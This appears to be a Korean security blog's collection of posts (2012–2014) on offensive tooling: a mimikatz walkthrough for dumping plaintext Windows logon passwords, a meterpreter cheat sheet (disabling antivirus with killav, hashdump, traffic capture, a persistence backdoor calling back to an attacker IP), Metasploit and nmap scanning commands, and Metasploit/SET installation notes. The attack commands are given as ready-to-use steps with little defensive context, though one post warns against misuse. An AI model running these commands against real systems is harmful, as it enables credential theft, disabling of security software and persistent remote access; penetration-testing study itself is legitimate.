2014.10.21 08:30

window 계정 패스워드 찾기 mimikatz


출처 : http://www.sysnet.pe.kr/Default.aspx?mode=2&sub=0&detail=1&pageno=0&wid=1666&rssMode=1&wtype=0




아래와 같은 글이 있어서,

윈도우7, 8의 취약점을 이용한 어드민 계정 탈취 가능 현상
; http://social.msdn.microsoft.com/Forums/ko-KR/5a52cdf9-7922-4b52-9ea7-f2f962b93ae3/7-8-?forum=vistako


mimikatz 도구에 대해 검색해 보았습니다. 현재 github에 소스코드까지 공개되어 있어 가벼운 마음으로 다운로드 받아 테스트를 시작했습니다.

gentilkiwi/mimikatz 
; https://github.com/gentilkiwi/mimikatz/releases


제가 다운로드 받은 버전은 오늘자 기준 최신 버전인 "mimikatz 2.0 alpha 20140501"이고, 제 VM 테스트 머신 중에 윈도우 8에서 실행했으나 다음과 같이 동작하지 않았습니다.


아래의 소개 PPT 자료에 보니,

mimikatz
; http://fr.slideshare.net/gentilkiwi/mimikatz-ossir


XP, 2003, Vista, 2008, 7, 2008R2, 8, 2012의 x86/x64 버전에서 동작한다고 하는데 이상하군요. 혹시나 싶어 cmd.exe를 "관리자 권한"으로 실행시킨 다음 "privilege::debug" 명령을 실행해 보았습니다. 그랬더니 성공합니다. ^^

mimikatz # privilege::debug
Privilege '20' OK


그 다음 "sekurlsa::logonpasswords" 명령을 내리면 계정의 암호가 평문과 함께 출력됩니다. (테스트 해보니 8.1에서도 동작합니다.)

재미있는 점이 있다면, 현재 "로그인 중인 사용자 계정과 컴퓨터가 실행 중인 동안 로그인을 했던 사용자에 한해서만" 암호를 알아낼 수 있다는 점입니다. 즉, 컴퓨터에 계정이 등록되었다고 해도 mimikatz를 실행하는 시점의 컴퓨터가 살아 있는 동안 로그인을 한 적이 없다면 그 사용자 계정의 암호는 알아낼 수 없습니다.




Posted by k1rha
2012.09.06 19:12

메타스플로잇에서 안쓰던기능까지 한번 리뷰하는 느낌이였다. 


용량이 20M 라서 ...링크를 걸어본다.


http://down.posquit0.com/Posquit0-Metasploit_101.pdf


armitego 의경우는 시연으로만보여줘서..자료가없음..


한가지 확실한 것은 절대로 악용해서는 안되며 악용할생각도 해서는안된다.. 


다만 연구나 진단을 위해만사용해야 한다는 점!!  


Posted by k1rha
2012.07.24 15:43

백신 소프트웨어 무력화

meterpreter > run killav   


시스템 패스워드 해시 값 얻기

run hashdump 



공격 대상 시스템의 전체 트래픽 살펴보기

meterpreter>run packetrecorder -i 1 



시스템 스크레이핑

run scraper 



백도어 만들기,

 시스템 재부팅된 이후에도 미터프리터가 수행 될 수 있게 미터프리터 에이전트를 삽입.

리버스 연결일 경우 공격자 시스템에 다시 접속하는 대상 시스템의 간격을 조정할수 있음


>run persistence -X -i 50 -p 443 -r [source_ip] 

X 옵션이 부팅시 다시시작하겠음 


Posted by k1rha
2012.07.24 14:46

ssh 스캐닝

 msf>use scanner/ssh/ssh_version

>set RHOST 127.0.0.1/24   //대역폭 스캔

>set THREADS 50

>run 


ftp anonymous 스캔 

msf>use auxiliary/scanner/ftp/anonymouse

>set RHOSTS 127..0.1/24

>set THREADS 50

>run


위의 ftp 경우 읽기 쓰기 권한까지 표시되서 나온다. 



snmp 스캐닝 


msf>use use scanner/snmp/snmp_login

>set RHOSTS 127.0.0.1/24

>set THREADS 50

>run

 



nmap 취약점 스캐닝


 nmap -sT -A --script=smb-check-bulns -P0 [target _ IP]


Posted by k1rha
2012.07.18 01:29

http://blog.naver.com/eqelizer?Redirect=Log&logNo=20142712784

Posted by k1rha
2012.06.19 23:45

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

2012.06.19 03:48

Metasploit Framework 우분투에 설치하기


-루비 의존패키지 설치 

subversion ruby rubygems ruby-openssl libopenssl-ruby 

===========================================================


#sudo apt-get install ruby

#sudo apt-get install rubygems

#sudo apt-get install ruby-openssl

#sudo apt-get install libopenssl-ruby

#sudo apt-get install irb

#sudo apt-get install ri

#sudo apt-get install libyaml-ruby



#sudo apt-get install subversion

#sudo apt-get install build-dep ruby

#sudo apt-get install ruby-dev libpcap-dev


==============================================================



SVN 을 이용하여 메타스플로잇의 코드들을 가져온다 

===============================================================

svn co https://www.metasploit.com/svn/framework3/trunk/

$ mv trunk metasploit  최신에서는 svn을 이용하지 않고 메타익스플로잇 공식 사이트에서 다운받게 된다.


#wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run



$ cd metasploit

$ ./msfconsole


IIIIII    dTb.dTb        _.---._

  II     4'  v  'B   .'"".'/|`.""'.

  II     6.     .P  :  .' / |  `.  :

  II     'T;. .;P'  '.'  /  |    `.'

  II      'T; ;P'    `. /   |    .'

IIIIII     'YvP'       `-.__|__.-'


I love shells --egypt



       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]

+ -- --=[ 884 exploits - 482 auxiliary - 145 post

+ -- --=[ 251 payloads - 28 encoders - 8 nops

       =[ svn r15468 updated today (2012.06.18)


msf >

----------------------------------------------------------------------------------------

명령어 사용법

1.use 

use 명령을 이용하면 원하는 모듈을 선택할 수 있고 그 명령과 관련된 커맨드로 들어간다. 

2.back

특정 모듈작업을 완료했거나 실수로 잘못된 모듈을 선택했다면 현재 선택된 모듈 밖으로 나가야 한다. 이 때 사용하는 것이 back 이다. 


3 check   

타켓의 시스템이 실제로 취약점을 가지고 있고 공격이 가능할 것인가 체크하는 명령어이다. 


4 connect 

msfconsole에 내장된 소형 netcat이라고 보면 된다. 

ssl과 프록시를 지원하고 ip와 port 정보를 넣고 connect를 하면 연결할 수 있다.    

netcat, ftp, telnet 등 원격 호스트에 연결할 수 있다. 


6 jobs 

jobs는 백그라운드로 실행되는 모듈의 작업을 도와준다. 

옵션을 이용해 목록을 볼 수도 있고 종료할 수도 있다.


7 load 

load는 플러그인 디렉토리에서 플러그인을 로드하는 명령어이다. 

기본 플러그인 디렉토리는 /opt/framework3/msf3/plugins 이다. 


8 unload 

load명령어로 로딩된 플러그인을 제거할 때 사용하는 명령어이다.


9 loadpath 

metasploit은 정의된 디렉토리에서 여러가지 정보를 가져오는데 제 3의 디렉토리에서 exploit, encoder, payload 등의 정보를 가져올 때 사용하는 명령어이다. 


10 info

이 명령은 모듈의 여러가지 정보를 볼 때 사용한다. 

보통 옵션이나 취약점을 가지고 있는 시스템의 종류 등을 확인할 때 유용하게 사용된다. 


11 show 

show 명령은 각종 정보의 리스트를 보고 싶을 때 사용한다. 

show auxiliary , show exploits , show payloads , show encoders , show nops 

위에 나열한 것처럼 사용할 수 있다. 


-------------------------------------------------------------------------



=========================================================================



SVN 을 이용하여 메타스플로잇의 SET 을 가져온다 (이는 악성코드같은것을 만들때 쓰인다)


=========================================================================

svn co http://svn.secmaniac.com/social_engineering_toolkit set/


이후 config 파일을 수정해야한다 


#cd config

#vi set_config


METAEXPLOIT PATH =  [절대경로 메타스프로잇 ]

=========================================================================




Posted by k1rha